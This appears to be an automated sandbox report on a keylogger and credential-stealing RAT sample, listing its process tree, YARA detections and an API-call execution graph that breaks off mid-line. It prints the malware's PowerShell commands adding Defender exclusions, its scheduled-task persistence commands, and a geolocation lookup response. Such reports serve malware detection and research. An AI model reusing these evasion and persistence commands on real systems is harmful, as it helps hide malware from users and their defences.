                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YAMCgXrvb0W8N6PwbNKuByNHqLhU5Sv2%2Bp0BaPdhY3G2j6mM8Ksd4sDDMoSM1NRj6JMAdnBP6xHsRRkt1iMD2m2undX35MSRiMveHDIxWJZ1K%2FziUJOkQL0W08x4KSLDbvKs5R8R"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8deadfe49e27e53e-DFW
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1285&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2220858&cwnd=251&unsent_bytes=0&cid=8f6e596cf3ecfc84&ts=153&x=0"
                                                                                                                                                                    2024-11-07 05:20:31 UTC158INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f
                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
                                                                                                                                                                    2024-11-07 05:20:31 UTC201INData Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                                                    Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:00:20:01
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                                                                                                                                                                    Imagebase:0xe30000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:00:20:04
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                                                                                                                                                                    Imagebase:0xa0000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:00:20:04
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:00:20:04
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
                                                                                                                                                                    Imagebase:0xa0000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:00:20:04
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:00:20:04
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"
                                                                                                                                                                    Imagebase:0x210000
                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:00:20:04
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:00:20:05
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                                                                                                                                                                    Imagebase:0x440000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:00:20:05
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                                                                                                                                                                    Imagebase:0x300000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:00:20:05
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                                                                                                                                                                    Imagebase:0x370000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:00:20:05
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                                                                                                                                                                    Imagebase:0x6d0000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:00:20:05
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    Imagebase:0x10000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 21%, ReversingLabs
                                                                                                                                                                    • Detection: 22%, Virustotal, Browse
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:00:20:07
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:00:20:09
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp"
                                                                                                                                                                    Imagebase:0x210000
                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:00:20:09
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:16
                                                                                                                                                                    Start time:00:20:09
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\zDAKFK.exe"
                                                                                                                                                                    Imagebase:0x480000
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5 hash:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:00:20:15
                                                                                                                                                                    Start date:07/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 1520
                                                                                                                                                                    Imagebase:0x1e0000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:13.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:1.7%
                                                                                                                                                                      Total number of Nodes:360
                                                                                                                                                                      Total number of Limit Nodes:15
                                                                                                                                                                      execution_graph 50633 1784c68 50634 1784c82 50633->50634 50635 1784c93 50634->50635 50639 1784dc1 50634->50639 50644 17842bc 50635->50644 50637 1784cb2 50640 1784de5 50639->50640 50648 1784ed0 50640->50648 50652 1784ec1 50640->50652 50645 17842c7 50644->50645 50660 17864f8 50645->50660 50647 178765c 50647->50637 50650 1784ef7 50648->50650 50649 1784fd4 50649->50649 50650->50649 50656 1784a18 50650->50656 50654 1784ed0 50652->50654 50653 1784fd4 50653->50653 50654->50653 50655 1784a18 CreateActCtxA 50654->50655 50655->50653 50657 1785f60 CreateActCtxA 50656->50657 50659 1786023 50657->50659 50661 1786503 50660->50661 50664 1786518 50661->50664 50663 17877cd 50663->50647 50665 1786523 50664->50665 50668 1786548 50665->50668 50667 1787caa 50667->50663 50669 1786553 50668->50669 50672 1787860 50669->50672 50671 1787da5 50671->50667 50674 178786b 50672->50674 50673 1788c71 50673->50671 50674->50673 50676 178cfc0 50674->50676 50677 178cfd0 50676->50677 50678 178d015 50677->50678 50681 178d578 50677->50681 50685 178d588 50677->50685 50678->50673 50682 178d588 50681->50682 50683 178d5cf 50682->50683 50689 178d350 50682->50689 50683->50678 50686 178d58d 50685->50686 50687 178d5cf 50686->50687 50688 178d350 CreateWindowExW 50686->50688 50687->50678 50688->50687 50690 178d355 50689->50690 50691 178dee0 50690->50691 50693 178d47c 50690->50693 50694 178d487 50693->50694 50695 1787860 CreateWindowExW 50694->50695 50696 178df4f 50695->50696 50699 178fce0 50696->50699 50697 178df89 50697->50691 50701 178fd11 50699->50701 50702 178fe11 50699->50702 50700 178fd1d 50700->50697 50701->50700 50703 5770ba8 CreateWindowExW 50701->50703 50704 5770b98 CreateWindowExW 50701->50704 50702->50697 50703->50702 50704->50702 50705 178d8e8 50706 178d8ed DuplicateHandle 50705->50706 50707 178d97e 50706->50707 50806 178b318 50809 178b401 50806->50809 50807 178b327 50811 178b40d 50809->50811 50810 178b444 50810->50807 50811->50810 50812 178b648 GetModuleHandleW 50811->50812 50813 178b675 50812->50813 50813->50807 50762 93b8078 50763 93b807d 50762->50763 50764 93b812e 50763->50764 50765 93b8143 50763->50765 50770 93b78e8 50764->50770 50766 93b78e8 3 API calls 50765->50766 50768 93b8152 50766->50768 50772 93b78f3 50770->50772 50771 93b8139 50772->50771 50775 93b8a98 50772->50775 50781 93b8a87 50772->50781 50788 93b7918 50775->50788 50778 93b8abf 50778->50771 50779 93b8ad7 CreateIconFromResourceEx 50780 93b8b66 50779->50780 50780->50771 50782 93b8a98 50781->50782 50783 93b7918 CreateIconFromResourceEx 50782->50783 50784 93b8ab2 50783->50784 50785 93b8abf 50784->50785 50786 93b8ad7 CreateIconFromResourceEx 50784->50786 50785->50771 50787 93b8b66 50786->50787 50787->50771 50789 93b8ae8 CreateIconFromResourceEx 50788->50789 50790 93b8ab2 50789->50790 50790->50778 50790->50779 50995 16fd01c 50996 16fd034 50995->50996 50997 16fd08e 50996->50997 51003 5771614 50996->51003 51011 5772de8 50996->51011 51019 577159c 50996->51019 51027 5772080 50996->51027 51031 5772090 50996->51031 51006 577161f 51003->51006 51004 5772e59 51008 5772e57 51004->51008 51045 577173c 51004->51045 51006->51004 51007 5772e49 51006->51007 51035 5772f70 51007->51035 51040 5772f80 51007->51040 51008->51008 51012 5772df8 51011->51012 51013 5772e59 51012->51013 51015 5772e49 51012->51015 51014 577173c CallWindowProcW 51013->51014 51016 5772e57 51013->51016 51014->51016 51017 5772f70 CallWindowProcW 51015->51017 51018 5772f80 CallWindowProcW 51015->51018 51016->51016 51017->51016 51018->51016 51020 57715a3 51019->51020 51021 5772e59 51020->51021 51023 5772e49 51020->51023 51022 577173c CallWindowProcW 51021->51022 51024 5772e57 51021->51024 51022->51024 51025 5772f70 CallWindowProcW 51023->51025 51026 5772f80 CallWindowProcW 51023->51026 51024->51024 51025->51024 51026->51024 51028 57720b6 51027->51028 51029 5771614 CallWindowProcW 51028->51029 51030 57720d7 51029->51030 51030->50997 51032 57720b6 51031->51032 51033 5771614 CallWindowProcW 51032->51033 51034 57720d7 51033->51034 51034->50997 51037 5772f80 51035->51037 51036 5773020 51036->51008 51049 5773038 51037->51049 51052 5773028 51037->51052 51041 5772f85 51040->51041 51043 5773038 CallWindowProcW 51041->51043 51044 5773028 CallWindowProcW 51041->51044 51042 5773020 51042->51008 51043->51042 51044->51042 51046 5771747 51045->51046 51047 577453a CallWindowProcW 51046->51047 51048 57744e9 51046->51048 51047->51048 51048->51008 51050 5773049 51049->51050 51056 577444f 51049->51056 51050->51036 51053 5773038 51052->51053 51054 5773049 51053->51054 51055 577444f CallWindowProcW 51053->51055 51054->51036 51055->51054 51057 577173c CallWindowProcW 51056->51057 51058 577448a 51057->51058 51058->51050 50814 7b5e4d1 50815 7b5e261 50814->50815 50815->50814 50818 f0304db 50815->50818 50839 f0304e8 50815->50839 50819 f0304e3 50818->50819 50820 f0304b5 50818->50820 50835 f0304db 12 API calls 50819->50835 50846 f0305ce 50819->50846 50862 f030518 50819->50862 50877 f030528 50819->50877 50822 f0304c9 50820->50822 50892 f030cf2 50820->50892 50897 f030b9c 50820->50897 50905 f030d58 50820->50905 50910 f030d14 50820->50910 50914 f030bd5 50820->50914 50919 f03108f 50820->50919 50923 f030c61 50820->50923 50927 f030b0a 50820->50927 50932 f03100f 50820->50932 50936 f030a25 50820->50936 50940 f030f31 50820->50940 50945 f030cd0 50820->50945 50821 f03050f 50821->50815 50822->50815 50835->50821 50840 f0304fd 50839->50840 50842 f0304db 12 API calls 50840->50842 50843 f030518 12 API calls 50840->50843 50844 f030528 12 API calls 50840->50844 50845 f0305ce 12 API calls 50840->50845 50841 f03050f 50841->50815 50842->50841 50843->50841 50844->50841 50845->50841 50847 f03055c 50846->50847 50849 f0305d1 50846->50849 50848 f030566 50847->50848 50850 f030c61 2 API calls 50847->50850 50851 f030a25 2 API calls 50847->50851 50852 f030b0a 2 API calls 50847->50852 50853 f03108f 2 API calls 50847->50853 50854 f03100f 2 API calls 50847->50854 50855 f030cf2 2 API calls 50847->50855 50856 f030f31 2 API calls 50847->50856 50857 f030cd0 2 API calls 50847->50857 50858 f030bd5 2 API calls 50847->50858 50859 f030d14 2 API calls 50847->50859 50860 f030d58 2 API calls 50847->50860 50861 f030b9c 4 API calls 50847->50861 50848->50821 50849->50821 50850->50848 50851->50848 50852->50848 50853->50848 50854->50848 50855->50848 50856->50848 50857->50848 50858->50848 50859->50848 50860->50848 50861->50848 50863 f03052c 50862->50863 50864 f030c61 2 API calls 50863->50864 50865 f030a25 2 API calls 50863->50865 50866 f030b0a 2 API calls 50863->50866 50867 f03108f 2 API calls 50863->50867 50868 f03100f 2 API calls 50863->50868 50869 f030566 50863->50869 50870 f030cf2 2 API calls 50863->50870 50871 f030f31 2 API calls 50863->50871 50872 f030cd0 2 API calls 50863->50872 50873 f030bd5 2 API calls 50863->50873 50874 f030d14 2 API calls 50863->50874 50875 f030d58 2 API calls 50863->50875 50876 f030b9c 4 API calls 50863->50876 50864->50869 50865->50869 50866->50869 50867->50869 50868->50869 50869->50821 50870->50869 50871->50869 50872->50869 50873->50869 50874->50869 50875->50869 50876->50869 50878 f030542 50877->50878 50879 f030c61 2 API calls 50878->50879 50880 f030a25 2 API calls 50878->50880 50881 f030b0a 2 API calls 50878->50881 50882 f03108f 2 API calls 50878->50882 50883 f03100f 2 API calls 50878->50883 50884 f030566 50878->50884 50885 f030cf2 2 API calls 50878->50885 50886 f030f31 2 API calls 50878->50886 50887 f030cd0 2 API calls 50878->50887 50888 f030bd5 2 API calls 50878->50888 50889 f030d14 2 API calls 50878->50889 50890 f030d58 2 API calls 50878->50890 50891 f030b9c 4 API calls 50878->50891 50879->50884 50880->50884 50881->50884 50882->50884 50883->50884 50884->50821 50885->50884 50886->50884 50887->50884 50888->50884 50889->50884 50890->50884 50891->50884 50893 f030cff 50892->50893 50950 7b5d7c8 50893->50950 50954 7b5d7c0 50893->50954 50894 f0312b1 50958 7b5d630 50897->50958 50962 7b5d629 50897->50962 50898 f030bb6 50899 f031202 50898->50899 50904 7b5d578 ResumeThread 50898->50904 50966 7b5d580 50898->50966 50900 f030f5e 50904->50900 50906 f030d79 50905->50906 50908 7b5d580 ResumeThread 50906->50908 50909 7b5d578 ResumeThread 50906->50909 50907 f030f5e 50908->50907 50909->50907 50912 7b5d630 Wow64SetThreadContext 50910->50912 50913 7b5d629 Wow64SetThreadContext 50910->50913 50911 f030d05 50912->50911 50913->50911 50915 f030be7 50914->50915 50970 7b5d700 50915->50970 50975 7b5d708 50915->50975 50916 f03103c 50921 7b5d7c0 